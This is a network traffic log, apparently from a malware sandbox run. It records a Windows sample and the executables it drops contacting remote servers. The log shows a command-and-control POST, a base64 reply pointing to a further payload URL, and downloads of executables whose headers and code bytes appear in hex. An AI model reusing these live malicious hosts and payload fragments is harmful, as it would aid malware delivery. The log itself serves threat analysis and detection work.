Apr 25, 2024 09:04:33.438520908 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFB Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="message"her7h48r------DAKEBAKFHCFHIEBFBAFB--
Apr 25, 2024 09:04:33.779320955 CEST	223	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 52 Connection: keep-alive Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 49 77 4d 79 39 30 61 57 74 30 62 32 73 75 5a 58 68 6c 66 44 42 38 4d 48 78 38 Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjIwMy90aWt0b2suZXhlfDB8MHx8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	185.172.128.228	80	5288	C:\Users\user\Desktop\g77dRQ1Csm.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:04:04.594016075 CEST	185	OUT	GET /BroomSetup.exe HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 25, 2024 09:04:04.802977085 CEST	1289	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:04:04 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT ETag: "4a4030-613b1bf118700" Accept-Ranges: bytes Content-Length: 4866096 Content-Type: application/x-msdos-program Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4a 00 00 00 00 00 00 0c 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08\|7@B.rsrc<<@@JJ@@@Boole
Apr 25, 2024 09:04:04.802989960 CEST	1289	IN	Data Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
Apr 25, 2024 09:04:04.803003073 CEST	1289	IN	Data Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
Apr 25, 2024 09:04:04.803158045 CEST	1289	IN	Data Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
Apr 25, 2024 09:04:04.803173065 CEST	1289	IN	Data Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
Apr 25, 2024 09:04:04.803339958 CEST	1289	IN	Data Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
Apr 25, 2024 09:04:04.803354025 CEST	1289	IN	Data Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00 Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
Apr 25, 2024 09:04:04.803366899 CEST	1289	IN	Data Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10 Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
Apr 25, 2024 09:04:04.803380013 CEST	1289	IN	Data Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00 Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
Apr 25, 2024 09:04:04.803497076 CEST	1289	IN	Data Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
Apr 25, 2024 09:04:05.012756109 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65 Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	20.157.87.45	80	5180	C:\Users\user\AppData\Local\Temp\u42w.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:04:10.280071020 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 25, 2024 09:04:10.490652084 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 25, 2024 09:04:10.689850092 CEST	469	IN	HTTP/1.1 200 OK cache-control: private content-length: 256 content-type: text/html; charset=utf-8 x-whom: Ioloweb9 date: Thu, 25 Apr 2024 07:04:09 GMT set-cookie: SERVERID=svc9; path=/ connection: close Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32 Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49754	20.157.87.45	80	5180	C:\Users\user\AppData\Local\Temp\u42w.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:04:25.065264940 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 25, 2024 09:04:25.278570890 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 25, 2024 09:04:25.479521990 CEST	405	IN	HTTP/1.1 200 OK cache-control: private content-length: 192 content-type: text/html; charset=utf-8 x-whom: Ioloweb9 date: Thu, 25 Apr 2024 07:04:24 GMT set-cookie: SERVERID=svc9; path=/ connection: close Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53 Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49755	185.172.128.203	80	1720	C:\Users\user\AppData\Local\Temp\u42w.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:04:33.992655039 CEST	76	OUT	GET /tiktok.exe HTTP/1.1 Host: 185.172.128.203 Cache-Control: no-cache
Apr 25, 2024 09:04:34.199383020 CEST	1289	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:04:34 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT ETag: "85400-616de2c892480" Accept-Ranges: bytes Content-Length: 545792 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 60 bc 47 00 e8 ab 56 05 00 68 ff be Data Ascii: MZ@!L!This program cannot be run in DOS mode.$c'i'i'i[7iYiX8i73i7i7i.9"i'i}i7%i7U&i'i=&i7&iRich'iPELv)f@@P(@( lp @.text1 `.rdata@@.data@ @.gfids@@.rsrc@(*@@.relocl @B`GVh
Apr 25, 2024 09:04:34.199398041 CEST	1289	IN	Data Raw: 46 00 e8 1c 73 05 00 59 c3 68 09 bf 46 00 e8 10 73 05 00 59 c3 68 13 bf 46 00 e8 04 73 05 00 59 c3 68 1d bf 46 00 e8 f8 72 05 00 59 c3 b9 a0 bd 47 00 e8 71 56 05 00 68 27 bf 46 00 e8 e2 72 05 00 59 c3 55 8b ec 83 ec 0c a1 6c b0 47 00 33 c5 89 45 Data Ascii: FsYhFsYhFsYhFrYGqVh'FrYUlG3EUEVUNEQWFPfyM3^{k]UVWFPFfEPy^]IpvGEUVFFPyEtj
Apr 25, 2024 09:04:34.199410915 CEST	1289	IN	Data Raw: 3e 00 75 64 6a 18 e8 06 69 05 00 8b f8 83 c4 04 89 7d 08 8b 4d 0c c7 45 fc 00 00 00 00 8b 51 04 85 d2 75 07 b9 a0 76 47 00 eb 0a 8b 4a 18 85 c9 75 03 8d 4a 1c 51 8d 4d ac e8 dc fb ff ff 8d 45 e0 c7 47 04 00 00 00 00 50 c7 07 58 c7 46 00 e8 90 58 Data Ascii: >udji}MEQuvGJuJQMEGPXFXMG>MdY_^]UAPEPX]US]3Vu+W3;uGtAEPPyXGEF;u_^[]
Apr 25, 2024 09:04:34.199424028 CEST	1289	IN	Data Raw: 01 8a 08 40 84 c9 75 f9 2b c2 3b f0 72 e3 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 55 ba 46 00 64 a1 00 00 00 00 50 53 81 ec 80 00 00 00 a1 6c b0 47 00 33 Data Ascii: @u+;r_^]SUkl$jhUFdPSlG3EVWPEd(~GGG0G)88z(\|G G4G`%Z/8G,QWEhGMEE~r>?u3QAu+QjEP
Apr 25, 2024 09:04:34.199462891 CEST	1289	IN	Data Raw: 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d c4 33 d2 e8 33 f8 ff ff c7 45 c4 00 00 00 00 c6 45 fc 0c 8b 4d d4 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 45 d8 85 c0 74 12 f0 0f c1 70 20 4e 75 0a 8b 4d d8 33 d2 e8 f3 Data Ascii: tA uM33EEMt@tjEtp NuM3EEMt@tj(p}GGGG31zG`%Z/GQWEhGMEE~r>?u3
Apr 25, 2024 09:04:34.199506998 CEST	1289	IN	Data Raw: 3b f3 ff ff c7 45 88 00 00 00 00 c6 45 fc 1c 8b 4d 98 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 4d 9c 85 c9 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d 9c 33 d2 e8 fa f2 ff ff c7 45 9c 00 00 00 00 c6 45 fc 1d 8b 4d Data Ascii: ;EEMt@tjMtA uM3EEMt@tjMtA uM3EEMt@tjMtA uM3xEEMt@tjE
Apr 25, 2024 09:04:34.199565887 CEST	1289	IN	Data Raw: 0f 00 00 00 c7 41 10 00 00 00 00 50 c6 01 00 e8 62 05 00 00 e8 cd 32 05 00 83 c4 18 83 7c 24 1c 00 76 57 ff 15 cc c9 47 00 8b 44 24 1c 40 50 6a 02 ff 15 c0 c9 47 00 8b f0 85 f6 74 3d 83 7c 24 20 10 8d 54 24 0c 8b 4c 24 1c 0f 43 54 24 0c 41 51 52 Data Ascii: APb2\|$vWGD$@PjGt=\|$ T$L$CT$AQRVGPGVGVjGVGD$ r@L$Pt$D$ D$D$\|$8D$$D$4CD$$GhG6'@'@#(@(@)@)@
Apr 25, 2024 09:04:34.199579000 CEST	1289	IN	Data Raw: 10 89 7e 10 72 0e 8b 06 5f c6 00 00 8b c6 5e 5b 5d c2 08 00 8b c6 5f 5e 5b c6 00 00 5d c2 08 00 8b c6 85 ff 74 0b 57 53 50 e8 5f 71 05 00 83 c4 0c 83 7e 14 10 89 7e 10 72 0f 8b 06 c6 04 38 00 8b c6 5f 5e 5b 5d c2 08 00 8b c6 c6 04 38 00 5f 8b c6 Data Ascii: ~r_^[]_^[]tWSP_q~~r8_^[]8_^[]hvG>US]VMWC;}+;G;uG99FF~rQj_^[]Qj_^[]9~s$vW
